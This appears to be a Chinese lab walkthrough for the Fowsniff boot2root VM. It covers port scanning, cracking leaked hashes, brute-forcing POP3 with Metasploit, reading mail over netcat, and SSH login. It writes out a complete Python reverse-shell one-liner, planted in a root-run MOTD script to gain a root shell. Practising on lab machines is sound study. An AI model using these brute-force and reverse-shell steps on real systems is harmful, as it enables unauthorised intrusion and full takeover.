渗透测试靶机fowsniff通关攻略

栏目: Python · 发布时间: 5年前

内容简介:大家好,今天我们的靶机是fowsniff,这是一个boot2root的挑战,目的是获取root权限。靶机下载地址在废话不多说,直接进入实际操作。·端口扫描和IP发现

介绍

大家好,今天我们的靶机是fowsniff,这是一个boot2root的挑战,目的是获取root权限。靶机下载地址在 这里

废话不多说,直接进入实际操作。

目录

·端口扫描和IP发现

· 测试80端口

· 在pastebin上找到哈希值

· 解码哈希

· 暴力破解pop3登录

· 连接到pop3

· 找到ssh用户名和密码

· 找到提权的方法

· 利用系统配置不当

· 获取root权限

· 获取flag

实战过程

我们先开始进行端口扫描,使用netdiscover命令:

netdiscover

渗透测试靶机fowsniff通关攻略

发现目标IP地址是192.168.1.29

接下来用nmap神器来扫描目标IP地址,命令如下:

nmap -A -p -T4 192.168.1.29

渗透测试靶机fowsniff通关攻略

扫描结果显示有4个端口开放,22(ssh),80(http),110(pop3),143(imap)。

先看看80端口会不会有收获,打开浏览器访问:

渗透测试靶机fowsniff通关攻略

页面上没有发现什么,继续使用dirb和nikto进行扫描也没有什么收获,于是我Google了一番页面上显示的这个fowsniff corp,发现了一个包含用户名和密码的pastebin链接。(链接在此)。

渗透测试靶机fowsniff通关攻略

我们找到了一些哈希值并进行在线破解,找到了一些电子邮件对应的密码,不过有9个用户名,却只破解了8个哈希,如图:

渗透测试靶机fowsniff通关攻略

所以我创建了两个字典,一个是用户名字典,一个是密码字典。我们将使用这两个字典来爆破pop3登录。

渗透测试靶机fowsniff通关攻略

我们使用msf来爆破pop3登录,命令和配置如下:

msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run

运行之后我们找到了正确的凭证,“seina:scoobydoo2”,如图:

渗透测试靶机fowsniff通关攻略

接着我们连接到靶机的pop3服务上,使用刚才获取的凭证进行登录。登录上之后,我们查看下信息,发现有两条信息,命令如下:

nc 192.168.1.29 110
user seina
pass scoobydoo2
list

渗透测试靶机fowsniff通关攻略

我们查看第一条信息的内容,发现它包含ssh的密码

retr 1

渗透测试靶机fowsniff通关攻略

接着查看第二条信息,信息中可以看到发件人是[email protected],可以推断用户名是baksteen:

retr 2

渗透测试靶机fowsniff通关攻略

接着我们使用刚才获得的凭证,也就是“baksteen:S1ck3nBluff+secureshell”来登录ssh:

ssh <a href="/cdn-cgi/l/email-protection" data-cfemail="3153505a424554545f710008031f0007091f001f0308">[email protected]</a>

渗透测试靶机fowsniff通关攻略

登录成功。

对系统进行一下枚举,发现用户baksteen属于两个不同的组。我们尝试找到属于users组的文件,发现了一个脚本“cube.sh”,查找命令如下:

find / -group users -type f 2>/dev/null

渗透测试靶机fowsniff通关攻略

我们查看一下这个脚本文件的内容,发现它包含我们ssh登陆后出现的界面信息,对照上图ssh登录成功后的截图便知。

cd /opt/cube
cat cube.sh

渗透测试靶机fowsniff通关攻略

我们使用vim打开该文件,并在文件结尾添加一行 Python 反弹 shell 的命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

如图:

渗透测试靶机fowsniff通关攻略

保存后,我们尝试执行该脚本,报错,错误信息是“Python command is not found”。于是我们在系统中查找Python,发现安装的是Python3,如图:

渗透测试靶机fowsniff通关攻略

所以我们修改反弹shell的命令为Python3,如下:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

渗透测试靶机fowsniff通关攻略

由于我们登录到ssh时看到的banner跟cube.sh脚本包含的内容相似,所以我们来查看下“etc/update-motd.d”目录,查找运行改程序的可执行文件,发现了“00-header”这个文件运行这个shell脚本。

渗透测试靶机fowsniff通关攻略

现在我们退出ssh,并且在本地使用netcat设置监听,然后我们重新连接ssh,这样的话,我们的反弹shell就成功执行了。

ssh <a href="/cdn-cgi/l/email-protection" data-cfemail="13717278606776767d53222a213d22252b3d223d212a">[email protected]</a>

渗透测试靶机fowsniff通关攻略

一旦成功登录,我们就获得了一个root用户的shell。我们切换到root目录,发现一个flag.txt的文件,查看文件便得到了我们的flag信息:

nc -lvp 1234
id
cd /root
cat flag.txt

渗透测试靶机fowsniff通关攻略


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

C语言接口与实现

C语言接口与实现

David R. Hanson / 郭旭 / 人民邮电出版社 / 2011-9 / 75.00元

《C语言接口与实现:创建可重用软件的技术》概念清晰、实例详尽,是一本有关设计、实现和有效使用C语言库函数,掌握创建可重用C语言软件模块技术的参考指南。书中提供了大量实例,重在阐述如何用一种与语言无关的方法将接口设计实现独立出来,从而用一种基于接口的设计途径创建可重用的API。 《C语言接口与实现:创建可重用软件的技术》是所有C语言程序员不可多得的好书,也是所有希望掌握可重用软件模块技术的人员......一起来看看 《C语言接口与实现》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

html转js在线工具
html转js在线工具

html转js在线工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换